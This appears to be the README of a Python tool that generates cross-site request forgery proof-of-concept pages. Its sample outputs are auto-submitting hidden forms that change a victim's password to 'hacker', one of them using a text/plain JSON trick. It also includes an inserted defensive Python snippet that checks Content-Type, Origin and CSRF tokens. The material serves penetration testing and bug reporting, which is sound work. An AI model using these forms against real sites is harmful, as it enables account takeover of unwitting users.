farid007/csrf_poc_generator

This script generates a PoC for Cross-site request forgery. You just need to provide the URL, method and parameters.


This is a Python script which generates a PoC for Cross-site request forgery using an auto-submitting form. You just need to provide the URL, method and parameters.

Required Package

python3 -m pip install yattag

Usage

Options

root@ghost:~# python3 csrf_poc_gen.py -h
usage: csrf_poc_gen.py [-h] [-m METHOD] [-u URL] [-p PARAMETERS] [-a AUTHOR]
                       [-e ENCTYPE]

This is a pyhton script which generates PoC for Cross-site request forgery
with autosubmit form. you just need to provide Url, method and parameters.

optional arguments:
  -h, --help            show this help message and exit
  -m METHOD, --method METHOD
                        Method
  -u URL, --url URL     url
  -p PARAMETERS, --parameters PARAMETERS
                        Request parameters
  -a AUTHOR, --author AUTHOR
                        Name of Author
  -e ENCTYPE, --enctype ENCTYPE
                        enctype

JSON Based CSRF PoC

Note: Some applications accept JSON data even when the request is sent with Content-Type: text/plain.

root@ghost:~# python3 csrf_poc_gen.py -u http://example.com -m post -p '{new_password: "hacker", re_password: "hacker", extra": =extra}' -e "text/plain"
<html>
  <title>
    This CSRF was found by 
  </title>
  <body>
    <h1>
      This POC was Created By CSRF PoC Generator Tool
    </h1>
    <form action="http://example.com" method="POST" enctype="text/plain">
      <input type="hidden" name="{new_password: %22hacker%22, re_password: %22hacker%22, extra%22: " value="extra}" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

To Generate PoC

Note: Parameters should be given as key=value pairs joined with & (key=value&key=value).

root@ghost:~# python3 csrf_poc_gen.py -u http://example.com -m post -p "new_password=hacker&re_new_password=hacker"
<html>
  <title>
    This CSRF was found by 
  </title>
  <body>
    <h1>
      This POC was Created By CSRF PoC Generator Tool
    </h1>
    <form action="http://example.com" method="POST" enctype="application/x-www-form-urlencoded">
      <input type="hidden" name="new_password" value="hacker" />
      <input type="hidden" name="re_new_password" value="hacker" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

Enctype

It supports three enctypes: application/x-www-form-urlencoded, multipart/form-data and text/plain.

root@ghost:~# python3 csrf_poc_gen.py -u http://example.com -m post -p "new_password=hacker&re_new_password=hacker" -e "text/plain"
<html>
  <title>
    This CSRF was found by 
  </title>
  <body>
    <h1>
      This POC was Created By CSRF PoC Generator Tool
    </h1>
    <form action="http://example.com" method="POST" enctype="text/plain">
      <input type="hidden" name="new_password" value="hacker" />
      <input type="hidden" name="re_new_password" value="hacker" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>
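The text/plain JSON PoC and the three enctypes above only work against an endpoint that parses whatever body arrives without checking its Content-Type, its Origin or a CSRF token. The following Python is an added defender-side example, not part of the csrf_poc_generator tool: it models those three server-side checks and runs them against a constructed request shaped like what a browser sends for an enctype="text/plain" auto-submitting form. ALLOWED_ORIGINS, the X-CSRF-Token header name and all sample values are assumptions.

```python
import json
from urllib.parse import urlsplit

# Assumed deployment origin of the application (a real app reads this from config).
ALLOWED_ORIGINS = {"https://app.example.com"}

def _media_type(content_type):
    # "text/plain; charset=UTF-8" -> "text/plain"; "" if the header is missing
    return content_type.split(";", 1)[0].strip().lower()

def check_json_request(headers, body, session_csrf_token):
    """Return the reasons to reject a JSON POST (headers keyed lower-case); [] means accept."""
    reasons = []
    # 1. An HTML form can only send urlencoded, multipart or text/plain bodies, so
    #    requiring application/json rules out every form-based submission.
    ctype = _media_type(headers.get("content-type", ""))
    if ctype != "application/json":
        reasons.append(f"content-type {ctype or '<missing>'} is not application/json")
    # 2. Browsers attach Origin to cross-site POSTs; accept only our own origin.
    origin = headers.get("origin") or headers.get("referer")
    if origin is None:
        reasons.append("no Origin or Referer header")
    else:
        p = urlsplit(origin)
        if f"{p.scheme}://{p.netloc}" not in ALLOWED_ORIGINS:
            reasons.append(f"origin {p.scheme}://{p.netloc} not allowed")
    # 3. A per-session token in a custom header cannot be set by an HTML form.
    if headers.get("x-csrf-token") != session_csrf_token:
        reasons.append("missing or mismatched CSRF token")
    # 4. Only a request that passed the checks above is worth parsing.
    try:
        json.loads(body)
    except ValueError:
        reasons.append("body is not valid JSON")
    return reasons

# Constructed sample: body sent by an enctype="text/plain" form with one hidden input
# named  {"new_password": "hacker", "re_password": "hacker", "extra": "  and valued  x"}  (name=value, CRLF).
FORGED_HEADERS = {"content-type": "text/plain", "origin": "https://attacker.invalid"}
FORGED_BODY = '{"new_password": "hacker", "re_password": "hacker", "extra": "=x"}\r\n'

# Constructed sample of the legitimate request the application's own JavaScript makes.
LEGIT_HEADERS = {"content-type": "application/json; charset=utf-8",
                 "origin": "https://app.example.com", "x-csrf-token": "tok123"}
LEGIT_BODY = '{"new_password": "hacker", "re_password": "hacker"}'

def forged_body_parses():
    # Why a parser that ignores Content-Type is fooled: the forged body is valid JSON.
    return json.loads(FORGED_BODY)
```

Note that the forged body parses cleanly, so a JSON endpoint that relies on parsing alone accepts it; the Content-Type, Origin and token checks are what reject it.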

With Discoverer Name

root@ghost:~# python3 csrf_poc_gen.py -u http://example.com -m post -p "new_password=hacker&re_new_password=hacker" -a "Hacker man"
<html>
  <title>
    This CSRF was found by Hacker man
  </title>
  <body>
    <h1>
      This POC was Created By CSRF PoC Generator Tool
    </h1>
    <form action="http://example.com" method="POST" enctype="application/x-www-form-urlencoded">
      <input type="hidden" name="new_password" value="hacker" />
      <input type="hidden" name="re_new_password" value="hacker" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>
